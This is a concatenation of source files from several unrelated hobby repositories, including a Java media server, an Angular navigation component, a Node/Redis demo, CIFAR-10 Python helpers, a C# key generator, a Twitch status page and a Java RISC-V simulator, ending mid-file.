import javax.persistence.Table;
import javax.validation.constraints.NotNull;
import javax.validation.constraints.Size;
import javax.xml.bind.annotation.XmlRootElement;
import org.hibernate.validator.constraints.NotEmpty;
/**
 * JPA entity mapping the {@code music} table: song metadata (artist, album,
 * track position) plus the backing file's name, type and path on disk.
 */
@Entity
@XmlRootElement
@Table(name="music")
public class Music {

    // Surrogate key generated by the database (IDENTITY column).
    @Id
    @GeneratedValue(strategy=GenerationType.IDENTITY)
    private int song_id;

    @NotEmpty
    @Size(min=4, max=50)
    private String song_name;

    @NotEmpty
    @Size(min=4, max=25)
    private String song_genre;

    // Release year. NOTE(review): @NotNull on primitive ints is a no-op.
    @NotNull
    private int song_year;

    @NotEmpty
    @Size(min=4, max=50)
    private String song_artist;

    @NotEmpty
    @Size(min=4, max=50)
    private String song_album;

    // Track position on the album ("track N of M").
    @NotNull
    private int song_track_no;

    @NotNull
    private int song_track_no_of;

    // Name, type and path of the media file on disk.
    // NOTE(review): max=50 differs from the SQL schema's VARCHAR(255)/(10) — confirm.
    @NotEmpty
    @Size(min=4, max=50)
    private String file_name;

    @NotEmpty
    @Size(min=4, max=50)
    private String file_type;

    @NotEmpty
    @Size(min=4, max=50)
    private String file_path;

    // Plain accessors below; no additional logic.
    public int getSong_id() {
        return song_id;
    }
    public void setSong_id(int song_id) {
        this.song_id = song_id;
    }
    public String getSong_name() {
        return song_name;
    }
    public void setSong_name(String song_name) {
        this.song_name = song_name;
    }
    public String getSong_genre() {
        return song_genre;
    }
    public void setSong_genre(String song_genre) {
        this.song_genre = song_genre;
    }
    public int getSong_year() {
        return song_year;
    }
    public void setSong_year(int song_year) {
        this.song_year = song_year;
    }
    public String getSong_artist() {
        return song_artist;
    }
    public void setSong_artist(String song_artist) {
        this.song_artist = song_artist;
    }
    public String getSong_album() {
        return song_album;
    }
    public void setSong_album(String song_album) {
        this.song_album = song_album;
    }
    public int getSong_track_no() {
        return song_track_no;
    }
    public void setSong_track_no(int song_track_no) {
        this.song_track_no = song_track_no;
    }
    public int getSong_track_no_of() {
        return song_track_no_of;
    }
    public void setSong_track_no_of(int song_track_no_of) {
        this.song_track_no_of = song_track_no_of;
    }
    public String getFile_name() {
        return file_name;
    }
    public void setFile_name(String file_name) {
        this.file_name = file_name;
    }
    public String getFile_type() {
        return file_type;
    }
    public void setFile_type(String file_type) {
        this.file_type = file_type;
    }
    public String getFile_path() {
        return file_path;
    }
    public void setFile_path(String file_path) {
        this.file_path = file_path;
    }
}<file_sep>/MediaCore/src/main/java/ie/tom/mediaserver/service/impl/MemberServiceImpl.java
package ie.tom.mediaserver.service.impl;
import java.util.ArrayList;
import java.util.List;
import java.util.ListIterator;
import ie.tom.mediaserver.dao.LoanDao;
import ie.tom.mediaserver.dao.MemberDao;
import ie.tom.mediaserver.entity.Loan;
import ie.tom.mediaserver.entity.Member;
import ie.tom.mediaserver.service.MemberService;
import org.springframework.transaction.annotation.Transactional;
/**
 * Service-layer implementation of MemberService.
 *
 * Plain CRUD operations delegate straight to MemberDao; overdue detection
 * cross-references members against all loans from LoanDao.
 */
@Transactional
public class MemberServiceImpl implements MemberService {
    // Injected once via the constructor and never reassigned.
    private final MemberDao memberDao;
    private final LoanDao loanDao;

    public MemberServiceImpl(MemberDao memberDao, LoanDao loanDao) {
        this.memberDao = memberDao;
        this.loanDao = loanDao;
    }

    @Override
    public void add(Member member) {
        memberDao.addMember(member);
    }

    @Override
    public void update(Member member) {
        memberDao.updateMember(member);
    }

    @Override
    public void save(Member member) {
        memberDao.saveMember(member);
    }

    @Override
    public void delete(Member member) {
        memberDao.deleteMember(member);
    }

    @Override
    public Member findMemberById(int member_id) {
        return memberDao.findById(member_id);
    }

    @Override
    public List<Member> findAllMembers() {
        return memberDao.findAll();
    }

    /**
     * Returns every member that has at least one overdue loan.
     *
     * Fixes over the original version:
     * - a member is added at most ONCE ({@code break} after the first overdue
     *   loan); the old loop appended the member again for every matching loan;
     * - the already-loaded {@code member} is reused instead of re-querying
     *   {@code memberDao.findById(...)} for an object we already hold.
     */
    @Override
    public List<Member> findAllOverdueMembers() {
        List<Member> overdueMembers = new ArrayList<Member>();
        // get all loans once; members are scanned against this list
        List<Loan> loans = loanDao.findAll();
        for (Member member : memberDao.findAll()) {
            for (Loan loan : loans) {
                // check if the loan belongs to this member
                if (loan.getMember_id() == member.getMember_id() && isOverdue(loan)) {
                    overdueMembers.add(member);
                    break; // one overdue loan is enough; avoid duplicates
                }
            }
        }
        return overdueMembers;
    }

    /**
     * Placeholder overdue test, preserved from the original {@code if (1 > 0)}.
     * TODO: compare the loan's date/time against the current date/time
     * (e.g. 1 day / 24 hours / 3 hours policy) instead of always-true.
     */
    private boolean isOverdue(Loan loan) {
        return true;
    }
}
| aad606d19ec23de49a04f327d01da04c7c9b5523 | [
"Markdown",
"Java",
"SQL"
] | 14 | Java | Tomaltach/MediaServer | 4fc97627058e5c2cdd978f153586cfe111c7bfb3 | 5f3d62066aefb9a185eac6dae457854126aa54d5 |
refs/heads/master | <repo_name>ecisneros/examen_angular<file_sep>/src/app/shared/layout/navigation/navigation.component.ts
import {Component, OnInit} from '@angular/core';
import {Modulo} from "../../../+dto/maintenance/modulo";
import {ModuloService} from "../../layout/navigation/http-modulo-service";
import {Observable} from "rxjs";
import {Response} from "@angular/http";
@Component({
  selector: 'sa-navigation',
  templateUrl: './navigation.component.html'
})
/**
 * Sidebar navigation component. Restores the authenticated user from
 * sessionStorage and the cached module list from localStorage.
 */
export class NavigationComponent implements OnInit {

  error = '';
  modulos: Array<Modulo> = [];
  private authenticatedUser: any;
  public errorMessage: string;

  constructor(private moduloService: ModuloService) {
    this.authenticatedUser = JSON.parse(sessionStorage.getItem("authenticatedUser") || '{}');
    // BUG FIX: `modulos` is typed Array<Modulo>, so the fallback for a missing
    // localStorage entry must be '[]' — the original '{}' silently produced a
    // plain object where an array is expected.
    this.modulos = JSON.parse(localStorage.getItem("modulos") || '[]');
  }

  ngOnInit() {
  }
}
| 973770bf8998cefcac3977e9488f7f7402659bcb | [
"TypeScript"
] | 1 | TypeScript | ecisneros/examen_angular | 90ce8b3f277ffe882f3020872b0bbb68f1063ccf | f792565149247420a32272afc3a37bc4123d0bea |
refs/heads/master | <repo_name>mmeyers00/nodejs-express-redis<file_sep>/README.md
nodejs-express-redis
====================
Example using Nodejs, Express, and Redis
<file_sep>/app.js
var fs = require('fs');
var express = require('express');
var app = express();
var nohm = require('nohm').Nohm;
var redis = require('redis').createClient();
nohm.setClient(redis);

// User model: unique name/email, country defaulting to 'Tibet', and a visit
// counter whose custom type adds the new value onto the old one.
nohm.model('User', {
  properties: {
    name: {
      type: 'string',
      unique: true,
      validations: [
        'notEmpty'
      ]
    },
    email: {
      type: 'string',
      unique: true,
      validations: [
        'email'
      ]
    },
    country: {
      type: 'string',
      defaultValue: 'Tibet',
      validations: [
        'notEmpty'
      ]
    },
    visits: {
      type: function incrVisitsBy(value, key, old) {
        return old + value;
      },
      defaultValue: 0,
      index: true
    }
  },
  methods: {
    // NOTE(review): "Contry" is a typo but part of the public model API;
    // renaming it would break any existing caller, so it is kept.
    getContryFlag: function () {
      return 'http://example.com/flag_'+this.p('country')+'.png';
    },
  }
});

// GET / — reply with the ids and emails of every stored User, once ALL
// redis lookups have completed.
app.get('/', function (req, res) {
  var email = new Array();
  var user = nohm.factory('User');
  user.find(function (err, ids) {
    // With no users there is no hgetall callback to fire; reply directly
    // (the original handler would never respond in this case).
    if (!ids || ids.length === 0) {
      return res.jsonp({ids: [], email: []});
    }
    // BUG FIX: the original replied inside the callback for the LAST index,
    // but hgetall callbacks may complete in any order, so the response could
    // be sent while other lookups were still pending. Count completions
    // instead of relying on index order.
    var pending = ids.length;
    ids.forEach(function (id) {
      redis.hgetall("nohm:hash:User:"+id, function (err, obj) {
        if (obj) {
          email.push(obj.email);
        }
        pending -= 1;
        if (pending === 0) {
          res.jsonp({ids: ids, email: email});
        }
      });
    });
  });
});

// GET /users — bulk-create demo users 200..999. Saves run asynchronously and
// only log their outcome; reply immediately so the request no longer hangs.
app.get('/users', function(req, res){
  for (var i = 200; i < 1000; i++) {  // 'var' added: 'i' was an implicit global
    var user = nohm.factory('User');
    user.p({
      name: 'Mark'+i,
      email: '<EMAIL>'+i+'<EMAIL>',
      country: 'Mexico',
      visits: 1
    });
    user.save(function (err) {
      if (err === 'invalid') {
        console.log('properties were invalid: ', user.errors);
      } else if (err) {
        console.log(err); // database or unknown error
      } else {
        console.log('saved user! :-)');
      }
    });
  }
  res.send('queued user saves');
});
app.listen(80); | c5cc1cabe6f66a53e64f4c02a52843d392b9cda5 | [
"Markdown",
"JavaScript"
] | 2 | Markdown | mmeyers00/nodejs-express-redis | d2025d7abd83d9f83a6128598db01d2bb53e3078 | 25a3192c3a25b5dc86c4649aa2f0c951fa93e758 |
refs/heads/master | <repo_name>spandcy/AdvML_project<file_sep>/README.md
# GR5242 Final Project <br>
## Team members:
- <NAME> (<EMAIL>)
- <NAME> (<EMAIL>)
- <NAME> (<EMAIL>)
- <NAME> (<EMAIL>)
## For **reproducing**:
- Two main folders for reproducing, **Baseline** and **Improve_Architecutres**; both of them can be reproduced on Colab
- Data file is the CIFAR-10 by keras
- Output file contain the some of the captured images of tensorboard and the tensorboard event files
- The pdf file on the main pages is the **report** of our whole project, please grade with that **pdf** thanks!
## Overview
The [CIFAR-10 Dataset](https://www.cs.toronto.edu/~kriz/cifar.html) is an important image classification dataset. It consists of 60000 32x32 colour images in 10 classes (airplanes, automobiles, birds, cats, deer, dogs, frogs, horses, ships, and trucks), with 6000 images per class. There are 50000 training images and 10000 test images.<br>
The **GOALS** of this project are to:
- Learn how to preprocess the image data by using simple baseline models
- Implement different architectures Convolutional Neural Networks (CNN) classifiers using GPU-enabled Tensorflow
- Here we pick VGG-14/16/19; Network in Network, Fractional pooling and Wide Residual Network 14X6/16X6
- Compare different CNN architectures pros and cons
**Tools:**
- GPU-enabled Tensorflow,colab
Following [suggestions](http://nicercode.github.io/blog/2013-04-05-projects/) by [<NAME>](http://nicercode.github.io/about/#Team) (@richfitz). This folder is organized as follows.
```
proj/
├── lib/
├── data/
├── doc/
├── figs/
└── output/
```
Please see each subfolder for a README file.
<file_sep>/Model_imporve_architecture/VGG/README.md
### VGG folder
+ VGG19 and VGG_16&14.ipynb can reproduce the tensorboard and network training.
+ VGG_14&16_batch_normalize.ipynb lists the training error and test error with sample output
+ Below is part of the VGG_19 structure

+ Below is the test accuracy and loss of the three VGG network


<file_sep>/lib/README.md
### Code lib Folder
The lib directory contains various files with function definitions including code.<file_sep>/lib/load_data_helper_functions.py
import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np
from sklearn.metrics import confusion_matrix
import time
from datetime import timedelta
import math
import os
def unpickle(file):
    """Deserialize one pickled CIFAR-10 batch file and return its contents.

    Keys are bytes (e.g. b'data', b'labels') because the batches were
    pickled under Python 2, hence encoding='bytes'.
    """
    import pickle
    with open(file, 'rb') as handle:
        contents = pickle.load(handle, encoding='bytes')
    return contents
def convEncoding(input, num_classes=10):
    """One-hot encode a sequence of integer class labels.

    Generalized: ``num_classes`` (default 10, matching CIFAR-10) replaces the
    hard-coded ten-element literal so the helper works for any label space.

    Args:
        input: iterable of integer class indices in [0, num_classes).
        num_classes: width of each one-hot row.
    Returns:
        List of float lists, one row per label, with 1.0 at the label index.
    """
    result = []
    for code in input:
        inner = [0.0] * num_classes
        inner[code] = 1.0
        result.append(inner)
    return result
def normalize(x):
    """Min-max scale ``x`` into the [0, 1] range.

    Robustness fix: a constant input now returns an all-zero array instead of
    performing the 0/0 division (NaN + RuntimeWarning) the original produced.
    """
    maximum = np.max(x)
    minimum = np.min(x)
    if maximum == minimum:
        return np.zeros_like(x, dtype=float)
    return (x - minimum) / (maximum - minimum)
# This is the function that returns the CIFAR-10 data.
# The load_data() function returns labels that are NOT one-hot encoded.
def load_data(norm=False, base_dir="D:/AML/FinalProject/data/cifar-10-batches-py/"):
    """Load CIFAR-10 pickle batches found under ``base_dir``.

    Args:
        norm: when True, min-max normalize train and test images.
        base_dir: directory (including trailing separator) holding
            data_batch_1..5 and test_batch. Parameterized so the loader is no
            longer tied to one machine's absolute "D:/AML/..." path; the
            default preserves the original behavior.
    Returns:
        (images_train, images_test, labels_train, labels_test, class_names)
    """
    files = [base_dir + "data_batch_" + str(i) for i in range(1, 6)]
    files_test = base_dir + 'test_batch'
    data_batch = unpickle(files[0])
    data_batch_test = unpickle(files_test)
    # image_data: the numpy array of combined image data from 5 batch files
    image_data = data_batch[b'data']
    image_data_test = data_batch_test[b'data']
    # label_data: list of labels combined from 5 batch files
    label_data = data_batch[b'labels']
    label_data_test = data_batch_test[b'labels']
    # Append batches 2..5 onto the arrays loaded from batch 1.
    for file in files[1:5]:
        data_batch = unpickle(file)
        image_data = np.concatenate((image_data, data_batch[b'data']), axis=0)
        label_data += data_batch[b'labels']
    images_train = image_data
    images_test = image_data_test
    labels_train = np.asarray(label_data)
    labels_test = np.asarray(label_data_test)
    # Fixed CIFAR-10 class names, index-aligned with the integer labels.
    class_names = ['airplane','automobile','bird','cat',
                   'deer','dog','frog','horse','ship','truck']
    if norm:
        images_train = normalize(images_train)
        images_test = normalize(images_test)
    return images_train, images_test, labels_train, labels_test, class_names
<file_sep>/lib/preprocess_data.py
import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np
from sklearn.metrics import confusion_matrix
import time
from datetime import timedelta
import math
import os
def reshape(images, width):
    """Reshape flat CIFAR rows into a (N, width, width, 3) float array.

    Each input row is [R-plane, G-plane, B-plane], width*width values per
    plane; output pixels are scaled to [0, 1] by dividing by 255.

    BUG FIX: the original hard-coded 32 inside the loop (np.zeros((32, 32, 3))
    and index i * 32 + j), so any ``width`` other than 32 produced wrong
    pixels or an IndexError. All occurrences now use ``width``.
    """
    # input images should be a 2-dimensional np.array,
    # e.g. [[1, 2, 3, ...]] for one image only
    first = images.shape[0]
    result = np.zeros((first, width, width, 3))
    area = width * width
    for index, image in enumerate(images):
        assert len(image) == area * 3
        # Split the flat row into its three color planes.
        redPixel = image[0:area] / 255
        greenPixel = image[area:2 * area] / 255
        bluePixel = image[2 * area:3 * area] / 255
        reshaped = np.zeros((width, width, 3))
        for i in range(width):        # row
            for j in range(width):    # column
                flat = i * width + j
                reshaped[i][j] = (redPixel[flat], greenPixel[flat], bluePixel[flat])
        result[index] = reshaped
    return result
def plot_images(images, TrueClass, PredClass=None):
    '''Show exactly 10 CIFAR images in a 2x5 grid with class names.

    images: 2-D array of flattened 32x32x3 rows (exactly 10 of them).
    TrueClass: class indices into class_names, one per image.
    PredClass: optional predicted class indices; when given, both true and
        predicted names are shown under each image.
    Blocks on plt.show() until the window is closed.
    '''
    class_names = ['airplane','automobile','bird','cat',
                   'deer','dog','frog','horse','ship','truck']
    assert len(images) == len(TrueClass) == 10
    # Each image as a sub-plot: totally 2 rows 5 columns
    fig, axes = plt.subplots(2, 5)
    fig.subplots_adjust(hspace=0.3, wspace=0.3)
    # Convert flat rows into (32, 32, 3) pixel arrays for imshow.
    reshaped_images = reshape(images, 32)
    for i, ax in enumerate(axes.flat):
        # Plot image and smooth it
        ax.imshow(reshaped_images[i],
                  interpolation='spline16')
        # Name of the true class.
        TrueName = class_names[TrueClass[i]]
        if PredClass is None:
            # Only show True class names
            xlabel = "True: {0}".format(TrueName)
        else:
            # Show both True and Pred class names
            PredName = class_names[PredClass[i]]
            xlabel = "True: {0}\nPred: {1}".format(TrueName, PredName)
        ax.set_xlabel(xlabel)
        # Remove ticks from the plot.
        ax.set_xticks([])
        ax.set_yticks([])
    plt.show()
def distorted_image(image, cropped_size, training):
    '''Augment (training) or centre-crop (evaluation) a SINGLE image tensor.

    Training path applies random crop, horizontal flip, and random
    hue/contrast/brightness/saturation jitter, then clamps pixels to [0, 1].
    Evaluation path only centre-crops to the same cropped_size so shapes match.
    '''
    if training:
        # Randomly crop the input image.
        image = tf.random_crop(image, size=[cropped_size, cropped_size, 3])
        # Randomly flip the image horizontally.
        image = tf.image.random_flip_left_right(image)
        # Randomly adjust hue, contrast and saturation.
        image = tf.image.random_hue(image, max_delta=0.05)
        image = tf.image.random_contrast(image, lower=0.3, upper=1.0)
        image = tf.image.random_brightness(image, max_delta=0.2)
        image = tf.image.random_saturation(image, lower=0.0, upper=2.0)
        # Limit the image pixels between [0, 1] in case of overflow.
        image = tf.minimum(image, 1.0)
        image = tf.maximum(image, 0.0)
    else:
        # Crop the input image around the centre so it is the same
        # size as images that are randomly cropped during training.
        image = tf.image.resize_image_with_crop_or_pad(image,
                                                       target_height=cropped_size,
                                                       target_width=cropped_size)
    return image
def preprocess(images, cropped_size, training):
    '''Apply distorted_image() to every image in a batch via tf.map_fn
    (random augmentation when training, centre-crop otherwise).'''
    images = tf.map_fn(lambda image: distorted_image(image, cropped_size, training), images)
    return images
| 4357f285b134d0ce4b9e9a7a1fd1e57411a0fbce | [
"Markdown",
"Python"
] | 5 | Markdown | spandcy/AdvML_project | e267f6094864ed9027ece5fe4d364e7f15270e3a | d0b458c9e0273f644cf26a7bb173033fb1315c92 |
refs/heads/master | <repo_name>MetSystem/CommonTools<file_sep>/CommonTools.Win/FormFunc/GeneralForm.cs
using System;
using System.Windows.Forms;
using CommonTools.Common;
namespace CommonTools.Win.FormFunc
{
    /// <summary>
    /// General tools form: hosts the custom primary-key generator
    /// (date pattern + GUID fragment) and navigation back to StartForm.
    /// Comments translated from Chinese; user-facing strings kept as-is.
    /// </summary>
    public partial class GeneralForm : BaseForm
    {
        public GeneralForm()
        {
            ApplySkin("McSkin");
            InitializeComponent();
        }

        /// <summary>
        /// Back: hide this form and show the start form again.
        /// </summary>
        /// Author : Napoleon
        /// Created : 2015-06-25 14:33:15
        private void BtnReturn_Click(object sender, EventArgs e)
        {
            StartForm start = new StartForm();
            Hide();
            start.Show();
        }

        /// <summary>
        /// Close the page: exit the whole application when this form closes.
        /// </summary>
        /// Author : Napoleon
        /// Created : 2015-06-25 14:32:57
        private void GeneralForm_FormClosed(object sender, FormClosedEventArgs e)
        {
            Application.Exit();
        }

        /// <summary>
        /// Generate a custom primary key: validates the date pattern, the GUID
        /// start/end positions (0-32) and the ordering choice, then emits a
        /// formatted timestamp concatenated with a GUID substring in the
        /// selected order.
        /// </summary>
        /// Author : Napoleon
        /// Created : 2015-06-25 15:07:01
        private void PicSubmitCustomId_Click(object sender, EventArgs e)
        {
            int guid1 = TxtGuid1.Text.ConvertToInt();
            int guid2 = TxtGuid2.Text.ConvertToInt();
            // A date format pattern is required.
            if (string.IsNullOrWhiteSpace(TxtDateTime.Text))
            {
                MessageBox.Show("请填写日期样式!");
                return;
            }
            // NOTE(review): -2 looks like the sentinel ConvertToInt() returns
            // for invalid input — confirm against CommonTools.Common.
            if (guid1 == -2 || guid2 == -2 || guid1 > 32 || guid2 > 32)
            {
                MessageBox.Show("请填写Guid起始位置(0-32)!");
                return;
            }
            if (guid1 > guid2)
            {
                MessageBox.Show("Guid开始位置不能大于结束位置!");
                return;
            }
            if (cobSelectOrderBy.SelectedIndex == -1)
            {
                MessageBox.Show("请选择生成顺序!");
                return;
            }
            string datetime = DateTime.Now.ToString(TxtDateTime.Text);
            string guid = Guid.NewGuid().ToString().Replace("-", "").Substring(guid1, guid2 - guid1);
            switch (cobSelectOrderBy.SelectedIndex)
            {
                case 0: // date + GUID
                    TxtResult.Text = datetime + guid;
                    break;
                case 1: // GUID + date
                    TxtResult.Text = guid + datetime;
                    break;
            }
        }
    }
}
<file_sep>/README.md
2014-12-12:开发通用工具:加解密功能(单向散列算法、常用密钥算法、Base64和Image转换算法).
2015-06-25:解密错误进行友好提示,增加自定义主键功能.
2015-07-25:使用YUICompressor2.4.6.jar进行批量压缩打包js/css文件.
| 5ecb1c13534d9c860eda88176a74a9407d66164a | [
"Markdown",
"C#"
] | 2 | C# | MetSystem/CommonTools | 0868dbfb146edd862e54db32e95983c4006c26b6 | 9c9b2122fabb32c1145e8cd2a746f136a43a471d |
refs/heads/master | <file_sep>// Base URL for API: https://api.twitch.tv/kraken
// Twitch Client ID: 7dz3226i5692rzqdjzkkpy44kk7rewp
// Array for all Twitch streamers on this site's list
var streamers = ["freecodecamp", "sodapoppin", "brunofin", "comster404", "hutch"];
function getProfileInfo() {
  // Populate each streamer's list entry with profile picture, name link,
  // stream description and online status from the Twitch kraken API.
  // FIX: `twitchURL` was assigned without `var` (implicit global); declared
  // locally — nothing else in this file references it.
  var twitchURL = 'https://api.twitch.tv/kraken/streams/';
  var clientID = '?client_id=7dz3226i5692rzqdjzkkpy44kk7rewp&';
  // Loop through array of streamers looking for their stream info.
  // The IIFE captures `i` per iteration for the async callback.
  for (var i = 0; i < streamers.length; i++) {
    (function(i) {
      $.getJSON(twitchURL + streamers[i] + clientID + 'callback=?', function(json) {
        var status = document.getElementsByClassName('status')[i];
        // Closed/unknown account: mark it and stop.
        if (json.error == 'Not Found') {
          status.innerHTML = 'Account Closed';
          return;
        }
        var pic = document.getElementsByClassName('profile-pic')[i];
        var info = document.getElementsByClassName('description')[i];
        var name = document.getElementsByClassName('profile-name')[i];
        var userName = json._links.channel.split('/');
        userName = userName[userName.length - 1];
        var userURL = 'https://twitch.tv/' + userName;
        // FIX: the original re-checked json.error == "Not Found" here, which
        // was unreachable — the early return above already handled it.
        if (json.stream == null) {
          // User exists but is not streaming.
          name.innerHTML = '<a href="' + userURL + '">' + userName + '</a>';
          status.innerHTML = '<a href="' + userURL + '">' + 'Offline' + '</a>';
        } else {
          // Change name/link, profile-pic src, stream info and status.
          pic.innerHTML = '<img src="' + json.stream.channel.logo + '">';
          name.innerHTML = '<a href="' + userURL + '">' + userName + '</a>';
          info.innerHTML = '<a href="' + userURL + '">' + json.stream.game + '</a>';
          status.innerHTML = '<a href="' + userURL + '">' + 'Online' + '</a>';
        }
      });
    })(i);
  }
}
window.onload = function() {
getProfileInfo();
}<file_sep># Twitch-Stream
Allows you to see which Twitch streamers are online and a short description.
| 07aec40cc0f9727e14872028af4252c12a513b54 | [
"JavaScript",
"Markdown"
] | 2 | JavaScript | jmorales2012/Twitch-Stream | fa1c1a3df5e5ab87110604cbf44021cee704de5c | 3a3205e8ec5d03fb9e7b3ec6e7ba71e984b42bf2 |
refs/heads/master | <file_sep>public class controller {
public boolean alu_src;
public String mem2reg;
public boolean reg_write;
public boolean mem_read;
public boolean mem_write;
//public String write_enable;
//public String read_enable;
public String aluop;
public boolean branch;
public boolean jalr_mode;
public boolean jal_mode;
//boolean lui_mode;
//String writeback;
public controller(String instr) throws Exception{
opcode op = instrOps.findOp(instr);
alu_src = ( op == opcode.OP_OP_IMM ||
op == opcode.OP_LOAD ||
op == opcode.OP_STORE ||
op == opcode.OP_JALR ||
op == opcode.OP_LUI);
switch (op){
case OP_LOAD:
case OP_LOAD_FP:
mem2reg = "01";
break;
case OP_AUIPC:
mem2reg = "10";
break;
case OP_JAL:
case OP_JALR:
mem2reg = "11";
break;
default:
mem2reg = "00";
}
switch (op){
case OP_LOAD:
case OP_OP_IMM:
case OP_OP:
case OP_JAL:
case OP_LUI:
case OP_AUIPC:
case OP_JALR:
reg_write = false;
default:
reg_write = true;
}
mem_read = (op == opcode.OP_LOAD);
mem_write = (op == opcode.OP_STORE);
switch(op){
case OP_BRANCH:
aluop = "01";
break;
case OP_LUI:
case OP_AUIPC:
case OP_JAL:
aluop = "11";
break;
case OP_OP:
case OP_OP_IMM:
aluop = "10";
break;
default:
aluop = "00";
}
branch = (op == opcode.OP_BRANCH);
jalr_mode = (op == opcode.OP_JALR);
jal_mode = (op == opcode.OP_JAL);
}
}
<file_sep>public final class immediate_generator {
public static String imm(String inst) throws Exception{
opcode op = instrOps.findOp(inst);
switch(op){
case OP_LOAD:
case OP_JALR:
String flippedImmLoad = bin.flipStr(inst.substring(20,32));
String extendedLoad = bin.signExtend(flippedImmLoad, 32); //signExtend extends bit 0, so we need to flip the string
return extendedLoad;
case OP_OP_IMM:
if (instrOps.func3(inst) == "001" || instrOps.func3(inst) == "101"){
String flippedImmImm = bin.flipStr(inst.substring(20,25));
return bin.bitExtend(flippedImmImm, 32, '0');
}
else{
String flippedImmImm2 = bin.flipStr(inst.substring(20,32));
return bin.signExtend(flippedImmImm2,32);
}
case OP_STORE:
String flippedImmStore = bin.flipStr(inst.substring(7,12) + inst.substring(25,32));
return bin.signExtend(flippedImmStore, 32);
case OP_LUI:
case OP_AUIPC:
return bin.bitExtend(inst.substring(12,31), 32, '0');
case OP_JAL:
String ImmJAL = "0" + inst.substring(21,31) + inst.substring(20,21) + inst.substring(12,20) + inst.substring(31,32);
return bin.signExtend(ImmJAL, 32);
case OP_BRANCH:
String ImmBr = inst.substring(8,12) + inst.substring(25,31) + inst.substring(7,8) + inst.substring(31,32);
return bin.signExtend(ImmBr, 32);
default:
return bin.bitExtend("0", 32, '0');
}
}
}
<file_sep>public enum opcode {
    // Major-opcode mnemonics, one per group of the RISC-V base opcode map
    // (loads/stores, integer ALU, FP, atomics, fused-multiply, jumps,
    // branches, system, and the reserved custom slots).
    OP_LOAD,
    OP_LOAD_FP,
    OP_CUSTOM_0,
    OP_MISC_MEM,
    OP_OP_IMM,
    OP_AUIPC,
    OP_OP_IMM_32,
    OP_STORE,
    OP_STORE_FP,
    OP_CUSTOM_1,
    OP_AMO,
    OP_OP,
    OP_LUI,
    OP_OP_32,
    OP_MADD,
    OP_MSUB,
    OP_NMSUB,
    OP_NMADD,
    OP_OP_FP,
    OP_CUSTOM_2,
    OP_BRANCH,
    OP_JALR,
    OP_JAL,
    OP_SYSTEM,
    OP_CUSTOM_3
}
<file_sep>public final class alu_controller {
    /**
     * Maps (aluop hint, funct3, funct7) to an ALU operation.
     * Builds a 4-bit opcode string bit-by-bit from the decode tables below
     * (operation[3] is the MSB) and translates it via operation().
     * aluop meanings (set by controller): "01" branch compares,
     * "10" register/immediate ALU ops, "11" upper-imm/jump, "00" address add.
     */
    public static alu findOp(String aluop, String funct3, String funct7) throws Exception{
        boolean[] operation = new boolean[4];
        // Bit 3 of the ALU opcode.
        operation[3]= (((aluop.equals("10"))&&((funct3.equals("110")) || (funct3.equals("001")) || (funct3.equals("100"))||(funct7.equals("0000000") && (funct3.equals("101")))||(funct3.equals("011")))) ||
                ( (aluop.equals("01")) && ((funct3.equals("110")) || (funct3.equals("111")))));
        // Bit 2.
        operation[2]= (((aluop.equals("10"))&&((funct3.equals("000"))||(funct3.equals("001"))||(funct3.equals("100")) ) ) ||
                ((aluop.equals("00")) && ((funct3.equals("000"))||(funct3.equals("001"))||(funct3.equals("100")) || (funct3.equals("101")) || (funct3.equals("010"))) ) ||
                ((aluop.equals("01")) && ((funct3.equals("000")) || (funct3.equals("001")) || (funct3.equals("111")) || (funct3.equals("101")))) ||
                (aluop.equals("11")));
        // Bit 1 (funct7 0100000 distinguishes SUB/SRA variants).
        operation[1]= (( (aluop.equals("10"))&& ((funct7.equals("0100000")&&(funct3.equals("000"))) || (funct3.equals("100")) ||(funct3.equals("101")) ) ) ||
                ((aluop.equals("01"))&& ((funct3.equals("000")) || (funct3.equals("001"))) ));
        // Bit 0 (LSB).
        operation[0]= (( (aluop.equals("10")) && ((funct3.equals("010")) || (funct3.equals("011")) ) ) ||
                ((aluop.equals("01")) && ( (funct3.equals("100")) || (funct3.equals("101")) || (funct3.equals("110")) || (funct3.equals("111")))));
        // Serialize the four booleans MSB-first into e.g. "0110".
        String result = "";
        for (int i = 0; i < 4; i++ ){
            if (operation[i]){result += "1";}
            else {result += "0";}
        }
        return operation(result);
    }

    /**
     * Translates the 4-bit opcode string into an alu enum constant;
     * throws RISCVException for any combination not in the table.
     */
    private static alu operation (String aluopcode) throws Exception{
        switch (aluopcode){
            case "0000":
                return alu.ALU_AND;
            case "0001":
                return alu.ALU_OR;
            case "0010":
                return alu.ALU_ADD;
            case "0110":
                return alu.ALU_SUB;
            case "1100":
                return alu.ALU_NOR;
            case "0111":
                return alu.ALU_XOR;
            case "1000":
                return alu.ALU_SLT;
            case "1001":
                return alu.ALU_SLTU;
            case "0100":
                return alu.ALU_SRA;
            case "0011":
                return alu.ALU_SLL;
            case "0101":
                return alu.ALU_SRL;
            case "1010":
                return alu.ALU_SGE;
            case "1011":
                return alu.ALU_SGEU;
            default:
                throw new RISCVException("Unsupported ALU opcode: " + aluopcode);
        }
    }
}
<file_sep>public class registerFile {
private String[] registers;
/*
Register widths depend on the RISCV base variant. for RV32, they are 32 bits long,
RV64 are 64 bits long, RV128 are 128 bits long etc
*/
public registerFile(){
this.registers = new String[32];
//this.registers[0] = bin.bitExtend("0", 32, '0');
for (int i = 0; i < 32; i ++){
this.registers[i] = bin.bitExtend("0", 32, '0');
}
}
public String get(int reg){
return registers[reg];
}
public void handleWrite(String address, String val, boolean wrEnable){
if (wrEnable){
write(val, bin.uBinToInt(address));
}
}
private void write(String val, int reg){
if(reg > 32 || reg < 0){
throw new IndexOutOfBoundsException("Invalid register address: " + reg);
}
registers[reg] = val;
}
public void reset() {
for (int i = 0; i < 32; i++) {
registers[i] = bin.bitExtend("0", 32, '0');
}
}
}
<file_sep># processingProcessors
trying to understand riscv by writing it in java
Honestly ripes does too good of a job check them out:
https://github.com/mortbopet/Ripes
thank you for teaching me :)
<file_sep>import java.util.Scanner;
public class consoleInteract {

    private Scanner reader;
    // Help list shown by printCommands(). CONSISTENCY FIX: "func7" was handled
    // by the switch in read() but missing from this list; added.
    private String[] commands = {"done", "next (n)", "inst", "opcode", "func3", "func7", "rs1", "rs2", "rd", "list", "readdata1", "readdata2", "immediate", "operation",
            "aluop", "aluresult"};

    public consoleInteract(){
        reader = new Scanner(System.in);
    }

    /**
     * Interactive single-step prompt: prints the current PC, then loops on
